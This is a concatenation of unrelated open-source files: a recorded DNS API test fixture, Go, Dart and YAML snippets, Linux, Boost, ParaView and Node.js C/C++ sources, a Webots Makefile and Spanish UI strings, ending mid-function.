\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.test.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4872</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>TXT</type>\n\
\ <host>updated.testfqdn.lexicon-test.com.</host>\n <value>challengetoken</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4874</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>updated.testfull.lexicon-test.com.</host>\n\
\ <value>challengetoken</value>\n <opt/>\n </data>\n\
\ </result>\n <result>\n <status>ok</status>\n <id>4890</id>\n\
\ <data>\n <site-id>71</site-id>\n <type>A</type>\n\
\ <host>localhot.lexicon-test.com.</host>\n <value>127.0.0.1</value>\n\
\ <opt/>\n </data>\n </result>\n <result>\n \
\ <status>ok</status>\n <id>4918</id>\n <data>\n \
\ <site-id>71</site-id>\n <type>TXT</type>\n <host>orig.nameonly.test.lexicon-test.com.</host>\n\
\ <value>updated</value>\n <opt/>\n </data>\n \
\ </result>\n </get_rec>\n </dns>\n</packet>\n"}
headers:
cache-control: ['no-store, no-cache, must-revalidate, post-check=0, pre-check=0']
connection: [keep-alive]
content-length: ['8606']
content-type: [text/xml;charset=UTF-8]
date: ['Tue, 21 Aug 2018 08:30:44 GMT']
expires: ['Mon, 26 Jul 1990 05:00:00 GMT']
last-modified: ['Tue, 21 Aug 2018 08:30:44 GMT']
p3p: [CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"]
pragma: [no-cache]
server: [sw-cp-server]
set-cookie: ['locale=en-US; expires=Wed, 21-Aug-2019 08:30:44 GMT; Max-Age=31536000;
path=/; secure; HttpOnly']
transfer-encoding: [chunked]
status: {code: 200, message: OK}
version: 1
| {
"pile_set_name": "Github"
} |
package del_test
import (
"testing"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
// TestDel hooks Ginkgo into Go's standard `go test` runner: failures are
// reported through Gomega's Fail handler, and all specs registered in this
// package run as the "Del Suite".
func TestDel(t *testing.T) {
	RegisterFailHandler(Fail)
	RunSpecs(t, "Del Suite")
}
| {
"pile_set_name": "Github"
} |
# Action metadata for a StackStorm-style Python runner: posts a new comment
# (presumably via the Datadog API, given the DatadogCreateComment class —
# confirm against lib/comments.py).
name: create_comment
runner_type: run-python
description: "Add a new comment"
enabled: true
entry_point: run.py
parameters:
  # User-facing inputs.
  message:
    type: string
    description: "The comment text"
    required: true
  handle:
    type: string
    description: "The handle of the user making the comment"
    required: false
  related_event_id:
    type: integer
    description: "The id of another comment or event to reply to"
    required: false
  # Internal wiring: the Python class and module implementing the action.
  # Marked immutable so callers cannot override them at invocation time.
  cls:
    default: DatadogCreateComment
    immutable: true
    type: string
  module_path:
    default: lib.comments
    immutable: true
    type: string
| {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0-or-later */
/* RomFS internal definitions
*
* Copyright © 2007 Red Hat, Inc. All Rights Reserved.
* Written by David Howells ([email protected])
*/
#include <linux/romfs_fs.h>
/*
 * Per-inode romfs state; the VFS inode is embedded so ROMFS_I() can map
 * back to this structure with container_of().
 */
struct romfs_inode_info {
	struct inode vfs_inode;
	unsigned long i_metasize;	/* size of non-data area */
	unsigned long i_dataoffset;	/* from the start of fs */
};
/*
 * Total size of the romfs image.  The size is stashed directly in
 * sb->s_fs_info as a pointer-sized integer (rather than pointing to an
 * allocated structure), hence the double cast.
 */
static inline size_t romfs_maxsize(struct super_block *sb)
{
	return (size_t) (unsigned long) sb->s_fs_info;
}
/* Map a VFS inode back to its enclosing romfs_inode_info. */
static inline struct romfs_inode_info *ROMFS_I(struct inode *inode)
{
	return container_of(inode, struct romfs_inode_info, vfs_inode);
}
/*
 * mmap-nommu.c
 */
#if !defined(CONFIG_MMU) && defined(CONFIG_ROMFS_ON_MTD)
/* no-MMU MTD builds supply their own file ops (defined in mmap-nommu.c) */
extern const struct file_operations romfs_ro_fops;
#else
#define romfs_ro_fops	generic_ro_fops
#endif

/*
 * storage.c -- low-level access to the backing store
 */
/* read buflen bytes at offset pos into buf */
extern int romfs_dev_read(struct super_block *sb, unsigned long pos,
			  void *buf, size_t buflen);
/* length of the NUL-terminated string at pos, bounded by maxlen */
extern ssize_t romfs_dev_strnlen(struct super_block *sb,
				 unsigned long pos, size_t maxlen);
/* compare size bytes at pos against str */
extern int romfs_dev_strcmp(struct super_block *sb, unsigned long pos,
			    const char *str, size_t size);
| {
"pile_set_name": "Github"
} |
#ifndef BOOST_SMART_PTR_ENABLE_SHARED_FROM_THIS_HPP_INCLUDED
#define BOOST_SMART_PTR_ENABLE_SHARED_FROM_THIS_HPP_INCLUDED
//
// enable_shared_from_this.hpp
//
// Copyright 2002, 2009 Peter Dimov
//
// Distributed under the Boost Software License, Version 1.0.
// See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt
//
// http://www.boost.org/libs/smart_ptr/enable_shared_from_this.html
//
#include <boost/smart_ptr/weak_ptr.hpp>
#include <boost/smart_ptr/shared_ptr.hpp>
#include <boost/assert.hpp>
#include <boost/config.hpp>
namespace boost
{
template<class T> class enable_shared_from_this
{
protected:

    // The special members are deliberate no-ops: weak_this_ must track the
    // shared_ptr owning *this* particular object, so it is never copied or
    // assigned between instances.

    enable_shared_from_this() BOOST_NOEXCEPT
    {
    }

    enable_shared_from_this(enable_shared_from_this const &) BOOST_NOEXCEPT
    {
    }

    enable_shared_from_this & operator=(enable_shared_from_this const &) BOOST_NOEXCEPT
    {
        return *this;
    }

    ~enable_shared_from_this() BOOST_NOEXCEPT // ~weak_ptr<T> never throws, so this destructor must not throw either
    {
    }

public:

    // Obtain a shared_ptr sharing ownership with the shared_ptr that already
    // manages *this.  Precondition: the object is owned by a shared_ptr
    // (asserted below).
    shared_ptr<T> shared_from_this()
    {
        shared_ptr<T> owner( weak_this_ );
        BOOST_ASSERT( owner.get() == this );
        return owner;
    }

    shared_ptr<T const> shared_from_this() const
    {
        shared_ptr<T const> owner( weak_this_ );
        BOOST_ASSERT( owner.get() == this );
        return owner;
    }

public: // actually private, but avoids compiler template friendship issues

    // Note: invoked automatically by shared_ptr when it first takes ownership
    // of the object; records that owner in weak_this_.  Do not call directly.
    template<class X, class Y> void _internal_accept_owner( shared_ptr<X> const * ppx, Y * py ) const
    {
        if( weak_this_.expired() )
        {
            weak_this_ = shared_ptr<T>( *ppx, py );
        }
    }

private:

    mutable weak_ptr<T> weak_this_;
};
} // namespace boost
#endif // #ifndef BOOST_SMART_PTR_ENABLE_SHARED_FROM_THIS_HPP_INCLUDED
| {
"pile_set_name": "Github"
} |
description = Sistema de validación.
longdescription = Permitir la validación de los usuarios, gestionar la conexión.
login = Login
connect = Conectarse
password = Contraseña
key = Clave
buttons.login = Login
buttons.logout = Desconexión
failedToLogin = Fallo en la validación
titlePage.failedToLogin = Fallo en la validación
titlePage.login = Login
lostPassword = ¿Contraseña perdida?
rememberMe=Recuérdame
| {
"pile_set_name": "Github"
} |
/// A single channel entry with its numeric id, display name and logo URL.
class ChannelItem {
  int tid;
  String name;
  String logo;

  /// Builds a channel directly from its fields.
  ChannelItem({this.logo, this.name, this.tid});

  /// Builds a channel from a decoded JSON map with the keys
  /// `tid`, `name` and `logo`.
  ChannelItem.fromJson(Map<String, dynamic> json)
      : tid = json["tid"],
        name = json["name"],
        logo = json["logo"];
}
"pile_set_name": "Github"
} |
/*=========================================================================
Program: Visualization Toolkit
Module: vtkContourFilter.h
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================*/
/**
* @class vtkPVContourFilter
* @brief generate isosurfaces/isolines from scalar values
*
* vtkPVContourFilter is an extension to vtkContourFilter. It adds the
* ability to generate isosurfaces / isolines for AMR dataset.
*
* vtkPVContourFilter also handles cleaning up interpolation error in the output
* scalars array when `ComputeScalars` is set to true. For each requested
* contour value, the output scalar array may have an error introduced due to
* interpolation along an edge. This filter fixes that error so that for all
* points generated from a particular contour value, the scalar array will have
* exactly the same value.
*
* For certain inputs, this filter delegates operation to vtkContour3DLinearGrid.
* The input must meet the following conditions for this filter to be used:
*
* - all cells in the input are linear (i.e., not higher order)
* - the contour array is one of the types supported by the vtkContour3DLinearGrid
* - the ComputeScalars option is off
*
* @warning
* Certain flags in vtkAMRDualContour are assumed to be ON.
*
* @sa
* vtkContourFilter vtkAMRDualContour
*/
#ifndef vtkPVContourFilter_h
#define vtkPVContourFilter_h
#include "vtkContourFilter.h"
#include "vtkPVVTKExtensionsFiltersGeneralModule.h" //needed for exports
class VTKPVVTKEXTENSIONSFILTERSGENERAL_EXPORT vtkPVContourFilter : public vtkContourFilter
{
public:
  // Standard VTK type and print support.
  vtkTypeMacro(vtkPVContourFilter, vtkContourFilter);
  void PrintSelf(ostream& os, vtkIndent indent) override;

  static vtkPVContourFilter* New();

  // Pipeline entry point; dispatches REQUEST_DATA / REQUEST_DATA_OBJECT etc.
  int ProcessRequest(vtkInformation*, vtkInformationVector**, vtkInformationVector*) override;

protected:
  vtkPVContourFilter();
  ~vtkPVContourFilter() override;

  int RequestData(vtkInformation* request, vtkInformationVector** inputVector,
    vtkInformationVector* outputVector) override;

  // Creates the output data object matching the input type.
  virtual int RequestDataObject(vtkInformation* request, vtkInformationVector** inputVector,
    vtkInformationVector* outputVector);

  // Declare accepted input types / produced output types for each port.
  int FillInputPortInformation(int port, vtkInformation* info) override;
  int FillOutputPortInformation(int port, vtkInformation* info) override;

  /**
   * Class superclass request data. Also handles iterating over
   * vtkHierarchicalBoxDataSet.
   */
  int ContourUsingSuperclass(vtkInformation* request, vtkInformationVector** inputVector,
    vtkInformationVector* outputVector);

  /**
   * When `ComputeScalars` is true, the filter computes scalars for the
   * contours. However, due to interpolation errors, there's a small difference
   * between the requested contour value and the interpolated scalar value that
   * ends up getting computed. That makes it complicated to identify contours
   * for a specific scalar value. This method cleans the output scalars array to
   * exactly match requested values.
   */
  void CleanOutputScalars(vtkDataArray* outScalars);

private:
  // Copying a VTK pipeline object is not meaningful; use New()/ShallowCopy.
  vtkPVContourFilter(const vtkPVContourFilter&) = delete;
  void operator=(const vtkPVContourFilter&) = delete;
};
#endif // vtkPVContourFilter_h
| {
"pile_set_name": "Github"
} |
/*!
@file
Defines operators for Searchables.
@copyright Louis Dionne 2013-2017
Distributed under the Boost Software License, Version 1.0.
(See accompanying file LICENSE.md or copy at http://boost.org/LICENSE_1_0.txt)
*/
#ifndef BOOST_HANA_DETAIL_OPERATORS_SEARCHABLE_HPP
#define BOOST_HANA_DETAIL_OPERATORS_SEARCHABLE_HPP
#include <boost/hana/config.hpp>
#include <boost/hana/fwd/at_key.hpp>
BOOST_HANA_NAMESPACE_BEGIN namespace detail {
    // CRTP base class giving a Searchable-derived type an `operator[]`
    // that forwards to hana::at_key.  There is one overload per value
    // category of `*this` (lvalue, rvalue, const lvalue) so the derived
    // object is passed on with the matching reference qualification.
    template <typename Derived>
    struct searchable_operators {
        template <typename Key>
        constexpr decltype(auto) operator[](Key&& key) & {
            return hana::at_key(static_cast<Derived&>(*this),
                                static_cast<Key&&>(key));
        }

        template <typename Key>
        constexpr decltype(auto) operator[](Key&& key) && {
            return hana::at_key(static_cast<Derived&&>(*this),
                                static_cast<Key&&>(key));
        }

        template <typename Key>
        constexpr decltype(auto) operator[](Key&& key) const& {
            return hana::at_key(static_cast<Derived const&>(*this),
                                static_cast<Key&&>(key));
        }
    };
} BOOST_HANA_NAMESPACE_END
#endif // !BOOST_HANA_DETAIL_OPERATORS_SEARCHABLE_HPP
| {
"pile_set_name": "Github"
} |
// (C) Copyright Tobias Schwinger
//
// Use modification and distribution are subject to the boost Software License,
// Version 1.0. (See http://www.boost.org/LICENSE_1_0.txt).
//------------------------------------------------------------------------------
#ifndef BOOST_FT_IS_FUNCTION_HPP_INCLUDED
#define BOOST_FT_IS_FUNCTION_HPP_INCLUDED
#include <boost/mpl/aux_/lambda_support.hpp>
#include <boost/function_types/components.hpp>
namespace boost
{
  namespace function_types
  {
    // Metafunction: evaluates to true iff T is a plain (non-member)
    // function type, optionally refined by the property tag Tag.
    // Works by decomposing T into its components and checking them
    // against the function tag.
    template< typename T, typename Tag = null_tag >
    struct is_function
      : function_types::represents
        < function_types::components<T>
        , function_types::tag<Tag ,detail::function_tag>
        >
    {
      // enables use of is_function as an MPL lambda expression
      BOOST_MPL_AUX_LAMBDA_SUPPORT(2,is_function,(T,Tag))
    };
  }
}
#endif
| {
"pile_set_name": "Github"
} |
# Copyright 1996-2020 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Webots Makefile system
#
# You may add some variable definitions hereafter to customize the build process
# See documentation in $(WEBOTS_HOME_PATH)/resources/Makefile.include
# Build an escaped-space form of WEBOTS_HOME (paths may contain spaces,
# and backslashes are normalized to forward slashes first).
null :=
space := $(null) $(null)
WEBOTS_HOME_PATH=$(subst $(space),\ ,$(strip $(subst \,/,$(WEBOTS_HOME))))
include $(WEBOTS_HOME_PATH)/resources/Makefile.os.include
ifeq ($(OSTYPE),linux)
CFLAGS = -std=c++11
endif
PYTHON_COMMAND ?= python
# Skip the build entirely (with an explanatory message) when Python, ROS,
# or a ROS 1 distribution is unavailable -- all are required to generate
# the services/messages this controller depends on.
ifeq (, $(shell which $(PYTHON_COMMAND) 2> /dev/null))
release debug profile clean:
	@echo "# \033[0;33m$(PYTHON_COMMAND) not installed, impossible to generate services/messages required by the ros controller, skipping ros controller\033[0m"
else
ifeq (, $(ROS_DISTRO))
release debug profile clean:
	@echo "# \033[0;33mROS not installed or 'ROS_DISTRO' not defined\033[0m"
else
ifeq (2, $(ROS_VERSION))
release debug profile clean:
	@echo "# \033[0;33mROS_DISTRO should not be a ROS2 distribution\033[0m"
else
CXX_SOURCES = $(wildcard *.cpp)
CXX_SOURCES += $(wildcard $(WEBOTS_HOME_PATH)/projects/default/controllers/ros/Ros*.cpp)
# NOTE(review): sources are collected as .cpp but the substitution below
# references .cxx -- confirm whether .cpp was intended here.
ifeq ($(OSTYPE),windows)
ros_automobile.exe: $(CXX_SOURCES:.cxx=.d)
else
ros_automobile: $(CXX_SOURCES:.cxx=.d)
endif
INCLUDE = -I$(WEBOTS_HOME_PATH)/projects/default/controllers/ros -isystem $(WEBOTS_HOME_PATH)/projects/default/controllers/ros/include -isystem /opt/ros/$(ROS_DISTRO)/include
LIBRARIES += -lCppDriver -lCppCar -ldriver -lcar
# include ros libraries
LIBRARIES += -L/opt/ros/$(ROS_DISTRO)/lib -lxmlrpcpp -lcpp_common -lrosconsole_backend_interface -lroscpp -lrosconsole -lrosconsole_log4cxx -lroscpp_serialization -lrostime
ifeq ($(OSTYPE),windows)
LIBRARIES += -lws2_32
ifeq ($(MAKECMDGOALS),debug)
# The following option is fixing the following error
# appearing only on Windows 64 bits in debug mode
# (probably that the number of templates is causing this)
# RosSupervisor.o: too many sections
CFLAGS += -Wa,-mbig-obj
endif
endif
ifeq ($(OSTYPE),linux)
LIBRARIES += -Wl,-rpath,$(WEBOTS_HOME_PATH)/projects/default/controllers/ros/lib/ros
endif
ifeq ($(OSTYPE),darwin)
# Hide Boost warnings
CFLAGS += -Wno-unused-local-typedefs
# Fix warnings about the 'override' keyword.
CFLAGS += -std=c++11
endif
include $(WEBOTS_HOME_PATH)/resources/Makefile.include
endif
endif
endif
| {
"pile_set_name": "Github"
} |
#include "node_internals.h"
#include "node_buffer.h"
#include "node_errors.h"
#include "util-inl.h"
#include "base_object-inl.h"
namespace node {
using v8::Array;
using v8::ArrayBuffer;
using v8::Context;
using v8::Function;
using v8::FunctionCallbackInfo;
using v8::FunctionTemplate;
using v8::Integer;
using v8::Isolate;
using v8::Just;
using v8::Local;
using v8::Maybe;
using v8::MaybeLocal;
using v8::Nothing;
using v8::Object;
using v8::SharedArrayBuffer;
using v8::String;
using v8::Value;
using v8::ValueDeserializer;
using v8::ValueSerializer;
namespace {
// JS-exposed wrapper around v8::ValueSerializer.  Also implements the
// serializer delegate interface so that host objects, SharedArrayBuffers
// and data-clone errors can be handed off to JavaScript callbacks defined
// on the wrapper object.
class SerializerContext : public BaseObject,
                          public ValueSerializer::Delegate {
 public:
  SerializerContext(Environment* env,
                    Local<Object> wrap);

  ~SerializerContext() override = default;

  // ValueSerializer::Delegate hooks; each forwards to a same-named function
  // on the JS wrapper when one is present.
  void ThrowDataCloneError(Local<String> message) override;
  Maybe<bool> WriteHostObject(Isolate* isolate, Local<Object> object) override;
  Maybe<uint32_t> GetSharedArrayBufferId(
      Isolate* isolate, Local<SharedArrayBuffer> shared_array_buffer) override;

  static void SetTreatArrayBufferViewsAsHostObjects(
      const FunctionCallbackInfo<Value>& args);

  // JS-callable bindings mirroring the ValueSerializer API.
  static void New(const FunctionCallbackInfo<Value>& args);
  static void WriteHeader(const FunctionCallbackInfo<Value>& args);
  static void WriteValue(const FunctionCallbackInfo<Value>& args);
  static void ReleaseBuffer(const FunctionCallbackInfo<Value>& args);
  static void TransferArrayBuffer(const FunctionCallbackInfo<Value>& args);
  static void WriteUint32(const FunctionCallbackInfo<Value>& args);
  static void WriteUint64(const FunctionCallbackInfo<Value>& args);
  static void WriteDouble(const FunctionCallbackInfo<Value>& args);
  static void WriteRawBytes(const FunctionCallbackInfo<Value>& args);

  SET_NO_MEMORY_INFO()
  SET_MEMORY_INFO_NAME(SerializerContext)
  SET_SELF_SIZE(SerializerContext)

 private:
  ValueSerializer serializer_;
};
// JS-exposed wrapper around v8::ValueDeserializer, reading from a Buffer
// supplied at construction time.  The host-object delegate hook forwards
// to a JS callback on the wrapper when one is present.
class DeserializerContext : public BaseObject,
                            public ValueDeserializer::Delegate {
 public:
  DeserializerContext(Environment* env,
                      Local<Object> wrap,
                      Local<Value> buffer);

  ~DeserializerContext() override = default;

  MaybeLocal<Object> ReadHostObject(Isolate* isolate) override;

  // JS-callable bindings mirroring the ValueDeserializer API.
  static void New(const FunctionCallbackInfo<Value>& args);
  static void ReadHeader(const FunctionCallbackInfo<Value>& args);
  static void ReadValue(const FunctionCallbackInfo<Value>& args);
  static void TransferArrayBuffer(const FunctionCallbackInfo<Value>& args);
  static void GetWireFormatVersion(const FunctionCallbackInfo<Value>& args);
  static void ReadUint32(const FunctionCallbackInfo<Value>& args);
  static void ReadUint64(const FunctionCallbackInfo<Value>& args);
  static void ReadDouble(const FunctionCallbackInfo<Value>& args);
  static void ReadRawBytes(const FunctionCallbackInfo<Value>& args);

  SET_NO_MEMORY_INFO()
  SET_MEMORY_INFO_NAME(DeserializerContext)
  SET_SELF_SIZE(DeserializerContext)

 private:
  // Raw view into the input Buffer; kept valid by storing the Buffer on
  // the wrapper object in the constructor.
  const uint8_t* data_;
  const size_t length_;
  ValueDeserializer deserializer_;
};
// Ties the native serializer to its JS wrapper; MakeWeak() allows the
// wrapper (and thus this object) to be garbage-collected.
SerializerContext::SerializerContext(Environment* env, Local<Object> wrap)
  : BaseObject(env, wrap),
    serializer_(env->isolate(), this) {
  MakeWeak();
}

// Delegate hook: fetches the data-clone-error factory function stored on
// the JS wrapper, calls it with the message, and throws its return value.
void SerializerContext::ThrowDataCloneError(Local<String> message) {
  Local<Value> args[1] = { message };

  Local<Value> get_data_clone_error =
      object()->Get(env()->context(),
                    env()->get_data_clone_error_string())
                      .ToLocalChecked();

  CHECK(get_data_clone_error->IsFunction());
  MaybeLocal<Value> error =
      get_data_clone_error.As<Function>()->Call(env()->context(),
                                                object(),
                                                arraysize(args),
                                                args);

  // An empty result means the callback itself threw; leave that pending.
  if (error.IsEmpty()) return;

  env()->isolate()->ThrowException(error.ToLocalChecked());
}

// Delegate hook: asks a JS callback on the wrapper for the transfer id of
// a SharedArrayBuffer; falls back to the default delegate behavior when
// no callback function is installed.
Maybe<uint32_t> SerializerContext::GetSharedArrayBufferId(
    Isolate* isolate, Local<SharedArrayBuffer> shared_array_buffer) {
  Local<Value> args[1] = { shared_array_buffer };

  Local<Value> get_shared_array_buffer_id =
      object()->Get(env()->context(),
                    env()->get_shared_array_buffer_id_string())
                      .ToLocalChecked();

  if (!get_shared_array_buffer_id->IsFunction()) {
    return ValueSerializer::Delegate::GetSharedArrayBufferId(
        isolate, shared_array_buffer);
  }

  MaybeLocal<Value> id =
      get_shared_array_buffer_id.As<Function>()->Call(env()->context(),
                                                      object(),
                                                      arraysize(args),
                                                      args);

  if (id.IsEmpty()) return Nothing<uint32_t>();

  return id.ToLocalChecked()->Uint32Value(env()->context());
}

// Delegate hook: lets a JS callback serialize a host object; falls back to
// the default delegate when no callback function is installed.
Maybe<bool> SerializerContext::WriteHostObject(Isolate* isolate,
                                               Local<Object> input) {
  MaybeLocal<Value> ret;
  Local<Value> args[1] = { input };

  Local<Value> write_host_object =
      object()->Get(env()->context(),
                    env()->write_host_object_string()).ToLocalChecked();

  if (!write_host_object->IsFunction()) {
    return ValueSerializer::Delegate::WriteHostObject(isolate, input);
  }

  ret = write_host_object.As<Function>()->Call(env()->context(),
                                               object(),
                                               arraysize(args),
                                               args);

  if (ret.IsEmpty())
    return Nothing<bool>();

  return Just(true);
}

// JS constructor binding: `new Serializer()`.
void SerializerContext::New(const FunctionCallbackInfo<Value>& args) {
  Environment* env = Environment::GetCurrent(args);

  new SerializerContext(env, args.This());
}

// Writes the serialization wire-format header.
void SerializerContext::WriteHeader(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
  ctx->serializer_.WriteHeader();
}

// Serializes an arbitrary JS value; returns true on success.
void SerializerContext::WriteValue(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
  Maybe<bool> ret =
      ctx->serializer_.WriteValue(ctx->env()->context(), args[0]);

  if (ret.IsJust()) args.GetReturnValue().Set(ret.FromJust());
}

// Toggles whether typed arrays / DataViews go through WriteHostObject.
void SerializerContext::SetTreatArrayBufferViewsAsHostObjects(
    const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  bool value = args[0]->BooleanValue(ctx->env()->isolate());
  ctx->serializer_.SetTreatArrayBufferViewsAsHostObjects(value);
}

// Hands the accumulated serialized bytes to JS as a Buffer.
void SerializerContext::ReleaseBuffer(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());
  // Note: Both ValueSerializer and this Buffer::New() variant use malloc()
  // as the underlying allocator.
  std::pair<uint8_t*, size_t> ret = ctx->serializer_.Release();
  auto buf = Buffer::New(ctx->env(),
                         reinterpret_cast<char*>(ret.first),
                         ret.second);

  if (!buf.IsEmpty()) {
    args.GetReturnValue().Set(buf.ToLocalChecked());
  }
}

// Registers an ArrayBuffer under the given id for out-of-band transfer
// (see v8::ValueSerializer::TransferArrayBuffer).
void SerializerContext::TransferArrayBuffer(
    const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<uint32_t> id = args[0]->Uint32Value(ctx->env()->context());
  if (id.IsNothing()) return;

  if (!args[1]->IsArrayBuffer())
    return node::THROW_ERR_INVALID_ARG_TYPE(
        ctx->env(), "arrayBuffer must be an ArrayBuffer");

  Local<ArrayBuffer> ab = args[1].As<ArrayBuffer>();
  ctx->serializer_.TransferArrayBuffer(id.FromJust(), ab);
  return;
}

void SerializerContext::WriteUint32(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<uint32_t> value = args[0]->Uint32Value(ctx->env()->context());
  if (value.IsNothing()) return;

  ctx->serializer_.WriteUint32(value.FromJust());
}

// The 64-bit value arrives from JS as two 32-bit halves (hi, lo) and is
// recombined here.
void SerializerContext::WriteUint64(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<uint32_t> arg0 = args[0]->Uint32Value(ctx->env()->context());
  Maybe<uint32_t> arg1 = args[1]->Uint32Value(ctx->env()->context());
  if (arg0.IsNothing() || arg1.IsNothing())
    return;

  uint64_t hi = arg0.FromJust();
  uint64_t lo = arg1.FromJust();
  ctx->serializer_.WriteUint64((hi << 32) | lo);
}

void SerializerContext::WriteDouble(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<double> value = args[0]->NumberValue(ctx->env()->context());
  if (value.IsNothing()) return;

  ctx->serializer_.WriteDouble(value.FromJust());
}

// Appends the raw bytes of a TypedArray/DataView to the output stream.
void SerializerContext::WriteRawBytes(const FunctionCallbackInfo<Value>& args) {
  SerializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  if (!args[0]->IsArrayBufferView()) {
    return node::THROW_ERR_INVALID_ARG_TYPE(
        ctx->env(), "source must be a TypedArray or a DataView");
  }

  ArrayBufferViewContents<char> bytes(args[0]);
  ctx->serializer_.WriteRawBytes(bytes.data(), bytes.length());
}
// Caches a raw pointer/length view into the input Buffer.  The Buffer is
// stored on the wrapper object so it stays alive as long as this context.
DeserializerContext::DeserializerContext(Environment* env,
                                         Local<Object> wrap,
                                         Local<Value> buffer)
  : BaseObject(env, wrap),
    data_(reinterpret_cast<const uint8_t*>(Buffer::Data(buffer))),
    length_(Buffer::Length(buffer)),
    deserializer_(env->isolate(), data_, length_, this) {
  object()->Set(env->context(), env->buffer_string(), buffer).Check();

  MakeWeak();
}

// Delegate hook: lets a JS callback on the wrapper reconstruct a host
// object; falls back to the default delegate when no callback function is
// installed.  The callback must return an object.
MaybeLocal<Object> DeserializerContext::ReadHostObject(Isolate* isolate) {
  Local<Value> read_host_object =
      object()->Get(env()->context(),
                    env()->read_host_object_string()).ToLocalChecked();

  if (!read_host_object->IsFunction()) {
    return ValueDeserializer::Delegate::ReadHostObject(isolate);
  }

  Isolate::AllowJavascriptExecutionScope allow_js(isolate);
  MaybeLocal<Value> ret =
      read_host_object.As<Function>()->Call(env()->context(),
                                            object(),
                                            0,
                                            nullptr);

  if (ret.IsEmpty())
    return MaybeLocal<Object>();

  Local<Value> return_value = ret.ToLocalChecked();
  if (!return_value->IsObject()) {
    env()->ThrowTypeError("readHostObject must return an object");
    return MaybeLocal<Object>();
  }

  return return_value.As<Object>();
}

// JS constructor binding: `new Deserializer(buffer)`.
void DeserializerContext::New(const FunctionCallbackInfo<Value>& args) {
  Environment* env = Environment::GetCurrent(args);

  if (!args[0]->IsArrayBufferView()) {
    return node::THROW_ERR_INVALID_ARG_TYPE(
        env, "buffer must be a TypedArray or a DataView");
  }

  new DeserializerContext(env, args.This(), args[0]);
}

// Reads and validates the wire-format header; returns true on success.
void DeserializerContext::ReadHeader(const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<bool> ret = ctx->deserializer_.ReadHeader(ctx->env()->context());

  if (ret.IsJust()) args.GetReturnValue().Set(ret.FromJust());
}

// Deserializes the next JS value from the input stream.
void DeserializerContext::ReadValue(const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  MaybeLocal<Value> ret = ctx->deserializer_.ReadValue(ctx->env()->context());

  if (!ret.IsEmpty()) args.GetReturnValue().Set(ret.ToLocalChecked());
}

// Supplies the (Shared)ArrayBuffer that a transfer id in the stream
// refers to; accepts either ArrayBuffer or SharedArrayBuffer.
void DeserializerContext::TransferArrayBuffer(
    const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  Maybe<uint32_t> id = args[0]->Uint32Value(ctx->env()->context());
  if (id.IsNothing()) return;

  if (args[1]->IsArrayBuffer()) {
    Local<ArrayBuffer> ab = args[1].As<ArrayBuffer>();
    ctx->deserializer_.TransferArrayBuffer(id.FromJust(), ab);
    return;
  }

  if (args[1]->IsSharedArrayBuffer()) {
    Local<SharedArrayBuffer> sab = args[1].As<SharedArrayBuffer>();
    ctx->deserializer_.TransferSharedArrayBuffer(id.FromJust(), sab);
    return;
  }

  return node::THROW_ERR_INVALID_ARG_TYPE(
      ctx->env(), "arrayBuffer must be an ArrayBuffer or SharedArrayBuffer");
}

void DeserializerContext::GetWireFormatVersion(
    const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  args.GetReturnValue().Set(ctx->deserializer_.GetWireFormatVersion());
}

void DeserializerContext::ReadUint32(const FunctionCallbackInfo<Value>& args) {
  DeserializerContext* ctx;
  ASSIGN_OR_RETURN_UNWRAP(&ctx, args.Holder());

  uint32_t value;
  bool ok = ctx->deserializer_.ReadUint32(&value);
